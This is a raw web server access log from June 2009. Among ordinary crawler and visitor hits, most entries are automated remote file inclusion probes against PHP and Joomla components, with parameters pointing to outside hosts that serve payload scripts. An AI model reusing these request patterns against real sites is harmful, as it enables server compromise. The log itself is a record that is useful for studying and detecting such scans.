65.23.158.226 - - [19/Jun/2009:03:12:50 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:03:12:50 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:03:12:50 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.249.71.54 - - [19/Jun/2009:03:13:05 -0400] "GET /images/index7_suturneedls.jpg HTTP/1.1" 200 2781 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [19/Jun/2009:03:13:06 -0400] "GET /images/download_credit_sm.jpg HTTP/1.1" 200 2932 "-" "Googlebot-Image/1.0"
65.23.158.226 - - [19/Jun/2009:03:13:07 -0400] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.56.77.54 - - [19/Jun/2009:03:13:20 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
195.56.77.54 - - [19/Jun/2009:03:13:20 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
195.56.77.54 - - [19/Jun/2009:03:13:21 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
218.234.21.178 - - [19/Jun/2009:03:13:45 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:13:45 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:13:45 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
75.125.245.26 - - [19/Jun/2009:03:13:48 -0400] "GET //?_zb_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:03:13:57 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:03:14:02 -0400] "GET /logs//?_zb_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
65.55.106.180 - - [19/Jun/2009:03:14:02 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.49.99.7 - - [19/Jun/2009:03:14:17 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.234.21.178 - - [19/Jun/2009:03:14:26 -0400] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
202.60.70.28 - - [19/Jun/2009:03:14:27 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
202.60.70.28 - - [19/Jun/2009:03:14:27 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.811"
202.60.70.28 - - [19/Jun/2009:03:14:28 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
195.56.77.54 - - [19/Jun/2009:03:14:30 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
74.208.16.224 - - [19/Jun/2009:03:15:01 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
74.208.16.224 - - [19/Jun/2009:03:15:01 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
74.208.16.224 - - [19/Jun/2009:03:15:01 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
74.208.16.224 - - [19/Jun/2009:03:15:05 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
83.98.209.71 - - [19/Jun/2009:03:15:14 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:15:14 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:15:14 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:15:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45921 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.146.100 - - [19/Jun/2009:03:15:39 -0400] "GET /logs//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:15:42 -0400] "GET /logs/error_log.Q109021400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.146.100 - - [19/Jun/2009:03:15:52 -0400] "GET /logs/access_log.Q109051900//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.146.100 - - [19/Jun/2009:03:16:03 -0400] "GET /logs/access_log.Q109051900//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:16:20 -0400] "GET /logs/access_log.Q109060600//bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:16:22 -0400] "GET /logs/access_log.Q109060600%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:16:22 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:16:22 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:16:23 -0400] "GET /logs/access_log.Q109051000%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:16:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.60.70.28 - - [19/Jun/2009:03:16:29 -0400] "GET /logs/error_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
200.105.207.244 - - [19/Jun/2009:03:17:06 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:17:06 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:17:06 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:17:35 -0400] "GET /logs/error_log.Q108030900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.105.207.244 - - [19/Jun/2009:03:17:40 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
216.120.237.150 - - [19/Jun/2009:03:18:38 -0400] "GET /logs/access_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 283 "-" "libwww-perl/5.811"
216.120.237.150 - - [19/Jun/2009:03:18:38 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
216.120.237.150 - - [19/Jun/2009:03:18:38 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
200.105.207.244 - - [19/Jun/2009:03:18:45 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:18:45 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:18:45 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.208.16.224 - - [19/Jun/2009:03:18:45 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
200.105.207.244 - - [19/Jun/2009:03:19:05 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
213.33.143.3 - - [19/Jun/2009:03:19:16 -0400] "GET /logs/access_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
213.33.143.3 - - [19/Jun/2009:03:19:16 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
213.33.143.3 - - [19/Jun/2009:03:19:16 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.249.71.14 - - [19/Jun/2009:03:19:34 -0400] "GET /images/4541802_full.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.98.209.71 - - [19/Jun/2009:03:20:02 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:20:03 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:20:08 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:20:08 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:20:08 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:20:08 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:20:09 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:20:09 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:20:11 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:20:11 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:20:11 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:20:11 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.128.135.52 - - [19/Jun/2009:03:20:15 -0400] "GET /logs/access_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/Jun/2009:03:20:15 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/Jun/2009:03:20:15 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
200.105.207.244 - - [19/Jun/2009:03:20:57 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:21:06 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.252.33.227 - - [19/Jun/2009:03:21:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.252.33.227 - - [19/Jun/2009:03:21:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.38.16.107 - - [19/Jun/2009:03:21:13 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
75.252.33.227 - - [19/Jun/2009:03:21:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.252.33.227 - - [19/Jun/2009:03:21:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.252.33.227 - - [19/Jun/2009:03:21:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
91.121.137.51 - - [19/Jun/2009:03:21:18 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:03:21:18 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:21:22 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:21:22 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:21:23 -0400] "GET /logs/access_log.Q109051200/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:21:23 -0400] "GET /logs/access_log.Q109060900%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:21:23 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:03:21:26 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:03:21:40 -0400] "GET /logs/access_log.Q109053000//?_zb_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:21:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [19/Jun/2009:03:22:23 -0400] "GET //zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:22:23 -0400] "GET /logs//zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:22:23 -0400] "GET /logs/access_log.Q109053100//zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:22:46 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:22:47 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:22:47 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
65.55.106.180 - - [19/Jun/2009:03:22:47 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.16.107 - - [19/Jun/2009:03:23:03 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:03:23:06 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:23:10 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:23:43 -0400] "GET /logs/access_log.Q109060600%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:25:21 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:25:39 -0400] "GET /logs/access_log.Q109052600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.120.237.150 - - [19/Jun/2009:03:25:51 -0400] "GET /logs/error_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
62.128.135.52 - - [19/Jun/2009:03:26:08 -0400] "GET /logs/error_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
74.6.17.151 - - [19/Jun/2009:03:26:41 -0400] "GET /logs/error_log.Q109012500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [19/Jun/2009:03:26:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.21.178 - - [19/Jun/2009:03:26:44 -0400] "GET /logs/error_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
200.105.207.244 - - [19/Jun/2009:03:27:02 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
62.128.135.52 - - [19/Jun/2009:03:27:07 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
213.33.143.3 - - [19/Jun/2009:03:27:19 -0400] "GET /logs/error_log.Q109052900//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
65.23.158.226 - - [19/Jun/2009:03:27:44 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
